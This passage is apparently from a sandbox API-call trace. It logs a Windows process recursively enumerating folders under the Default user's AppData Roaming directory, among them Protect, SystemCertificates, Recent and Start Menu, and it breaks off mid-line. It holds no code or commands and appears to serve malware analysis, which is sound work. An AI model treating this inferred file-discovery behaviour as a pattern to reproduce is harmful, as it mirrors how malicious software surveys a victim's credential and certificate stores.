Explorer\\\\*", lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0x2d2510 [0262.569] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.569] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.569] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.569] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.569] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.569] lstrcmpiW (lpString1="Quick Launch", lpString2=".") returned 1 [0262.569] lstrcmpiW (lpString1="Quick Launch", lpString2="..") returned 1 [0262.569] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Internet Explorer\\\\Quick Launch\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.577] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.577] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.577] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.577] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.577] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.577] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.577] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.577] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.578] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.578] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.578] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0 [0262.578] FindClose (in: hFindFile=0x2d2510 | out: hFindFile=0x2d2510) returned 1 [0262.578] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.578] lstrcmpiW (lpString1="Protect", lpString2=".") returned 1 [0262.579] lstrcmpiW (lpString1="Protect", lpString2="..") returned 1 [0262.579] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Protect\\\\*", lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0x2d2510 [0262.579] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.579] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.580] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.580] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.580] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.580] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.580] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2=".") returned 1 [0262.580] lstrcmpiW (lpString1="S-1-5-21-3111613574-2524581245-2586426736-500", lpString2="..") returned 1 [0262.580] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Protect\\\\S-1-5-21-3111613574-2524581245-2586426736-500\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.588] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.588] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.588] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.588] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.588] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.588] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.588] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.588] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.589] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0 [0262.589] FindClose (in: hFindFile=0x2d2510 | out: hFindFile=0x2d2510) returned 1 [0262.589] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.589] lstrcmpiW (lpString1="SystemCertificates", lpString2=".") returned 1 [0262.589] lstrcmpiW (lpString1="SystemCertificates", lpString2="..") returned 1 [0262.589] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\*", lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0x2d2510 [0262.589] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.589] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.589] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.589] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.589] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.589] lstrcmpiW (lpString1="My", lpString2=".") returned 1 [0262.589] lstrcmpiW (lpString1="My", lpString2="..") returned 1 [0262.589] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.590] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.590] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.590] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.590] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.590] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.590] lstrcmpiW (lpString1="Certificates", lpString2=".") returned 1 [0262.590] lstrcmpiW (lpString1="Certificates", lpString2="..") returned 1 [0262.590] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\Certificates\\\\*", lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0x2d24b0 [0262.591] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.591] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.591] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.591] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.591] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0 [0262.591] FindClose (in: hFindFile=0x2d24b0 | out: hFindFile=0x2d24b0) returned 1 [0262.591] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.591] lstrcmpiW (lpString1="CRLs", lpString2=".") returned 1 [0262.591] lstrcmpiW (lpString1="CRLs", lpString2="..") returned 1 [0262.592] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CRLs\\\\*", lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0x2d24b0 [0262.592] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.592] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.592] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.592] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0 [0262.592] FindClose (in: hFindFile=0x2d24b0 | out: hFindFile=0x2d24b0) returned 1 [0262.592] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.592] lstrcmpiW (lpString1="CTLs", lpString2=".") returned 1 [0262.592] lstrcmpiW (lpString1="CTLs", lpString2="..") returned 1 [0262.592] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CTLs\\\\*", lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0x2d24b0 [0262.592] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.592] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.592] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.593] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0 [0262.593] FindClose (in: hFindFile=0x2d24b0 | out: hFindFile=0x2d24b0) returned 1 [0262.593] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.593] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.593] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0 [0262.593] FindClose (in: hFindFile=0x2d2510 | out: hFindFile=0x2d2510) returned 1 [0262.593] FindNextFileW (in: hFindFile=0x2d23f0, lpFindFileData=0x1ecbb0 | out: lpFindFileData=0x1ecbb0) returned 1 [0262.593] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0262.593] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0262.593] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\*", lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 0x2d2510 [0262.605] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.605] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.605] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.605] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.605] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.605] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.605] lstrcmpiW (lpString1="IECompatCache", lpString2=".") returned 1 [0262.605] lstrcmpiW (lpString1="IECompatCache", lpString2="..") returned 1 [0262.606] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\IECompatCache\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.606] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.606] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.607] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.607] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.607] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.607] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.607] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.607] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.607] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.607] lstrcmpiW (lpString1="Libraries", lpString2=".") returned 1 [0262.607] lstrcmpiW (lpString1="Libraries", lpString2="..") returned 1 [0262.607] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Libraries\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.609] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.609] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.609] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.609] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.609] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.610] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.610] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.610] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.610] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.610] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.610] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.610] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.610] lstrcmpiW (lpString1="Network Shortcuts", lpString2=".") returned 1 [0262.611] lstrcmpiW (lpString1="Network Shortcuts", lpString2="..") returned 1 [0262.611] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Network Shortcuts\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.611] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.611] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.611] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.611] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.611] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.611] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.611] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.611] lstrcmpiW (lpString1="Printer Shortcuts", lpString2=".") returned 1 [0262.611] lstrcmpiW (lpString1="Printer Shortcuts", lpString2="..") returned 1 [0262.611] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Printer Shortcuts\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.611] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.612] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.612] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.612] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.612] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.612] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.612] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.612] lstrcmpiW (lpString1="PrivacIE", lpString2=".") returned 1 [0262.612] lstrcmpiW (lpString1="PrivacIE", lpString2="..") returned 1 [0262.612] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\PrivacIE\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.613] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.613] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.613] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.613] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.613] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.613] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.613] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.613] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.613] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0262.613] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0262.614] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.614] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.615] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.615] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.615] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.615] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.615] lstrcmpiW (lpString1="AutomaticDestinations", lpString2=".") returned 1 [0262.615] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="..") returned 1 [0262.615] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\AutomaticDestinations\\\\*", lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0x2d24b0 [0262.615] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.615] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.615] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.615] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.615] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.615] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0 [0262.615] FindClose (in: hFindFile=0x2d24b0 | out: hFindFile=0x2d24b0) returned 1 [0262.615] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.616] lstrcmpiW (lpString1="CustomDestinations", lpString2=".") returned 1 [0262.616] lstrcmpiW (lpString1="CustomDestinations", lpString2="..") returned 1 [0262.616] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\CustomDestinations\\\\*", lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0x2d24b0 [0262.623] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.623] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.623] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.623] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.623] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.623] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.623] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.623] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0 [0262.623] FindClose (in: hFindFile=0x2d24b0 | out: hFindFile=0x2d24b0) returned 1 [0262.624] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.624] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.624] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.624] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.624] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0262.625] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0262.625] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\SendTo\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.626] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.626] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.626] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.627] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.627] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.627] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.627] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.627] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.627] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.627] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.627] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0 [0262.627] FindClose (in: hFindFile=0x2d2570 | out: hFindFile=0x2d2570) returned 1 [0262.628] FindNextFileW (in: hFindFile=0x2d2510, lpFindFileData=0x1ec110 | out: lpFindFileData=0x1ec110) returned 1 [0262.628] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0262.628] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0262.628] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\*", lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 0x2d2570 [0262.631] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.631] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.631] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.631] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.631] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.631] FindNextFileW (in: hFindFile=0x2d2570, lpFindFileData=0x1eb670 | out: lpFindFileData=0x1eb670) returned 1 [0262.631] lstrcmpiW (lpString1="Programs", lpString2=".") returned 1 [0262.631] lstrcmpiW (lpString1="Programs", lpString2="..") returned 1 [0262.631] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\*", lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 0x2d24b0 [0262.641] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.641] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.641] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.641] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.641] FindNextFileW (in: hFindFile=0x2d24b0, lpFindFileData=0x1eabd0 | out: lpFindFileData=0x1eabd0) returned 1 [0262.641] lstrcmpiW (lpString1="Accessories", lpString2=".") returned 1 [0262.642] lstrcmpiW (lpString1="Accessories", lpString2="..") returned 1 [0262.642] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Accessories\\\\*", lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 0x2d2630 [0262.646] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.646] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.646] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.646] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.646] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.646] lstrcmpiW (lpString1="Accessibility", lpString2=".") returned 1 [0262.646] lstrcmpiW (lpString1="Accessibility", lpString2="..") returned 1 [0262.646] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Accessories\\\\Accessibility\\\\*", lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 0x2d2690 [0262.648] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.648] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.648] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.648] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0262.648] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.648] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.649] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.649] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.649] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.649] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 0 [0262.649] FindClose (in: hFindFile=0x2d2690 | out: hFindFile=0x2d2690) returned 1 [0262.650] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.650] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.650] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.650] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.650] FindNextFileW (in: hFindFile=0x2d2630, lpFindFileData=0x1ea130 | out: lpFindFileData=0x1ea130) returned 1 [0262.650] lstrcmpiW (lpString1="System Tools", lpString2=".") returned 1 [0262.650] lstrcmpiW (lpString1="System Tools", lpString2="..") returned 1 [0262.650] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Accessories\\\\System Tools\\\\*", lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 0x2d2690 [0262.652] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0262.652] FindNextFileW (in: hFindFile=0x2d2690, lpFindFileData=0x1e9690 | out: lpFindFileData=0x1e9690) returned 1 [0262.652] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0262.652] lstrcmpiW (lpString1="..", lpString2="..") 